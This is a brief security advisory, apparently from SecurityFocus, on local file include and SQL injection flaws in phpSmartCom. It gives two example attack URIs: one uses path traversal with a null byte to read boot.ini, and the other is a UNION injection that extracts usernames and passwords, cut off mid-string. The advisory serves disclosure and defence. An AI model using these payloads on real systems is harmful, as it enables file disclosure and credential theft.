phpSmartCom Local File Include and SQL Injection Vulnerabilities

Attackers can exploit these issues via a browser.

The following example URIs are available:

http://www.example.com/phpsmartcom/index.php?p=../../../../../boot.ini%00

http://www.example.com/phpsmartcom/index.php?p=viewprofile uid=1'+union+select+1,uname,3,upwd,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+psc_users+w


 

Privacy Statement
Copyright 2010, SecurityFocus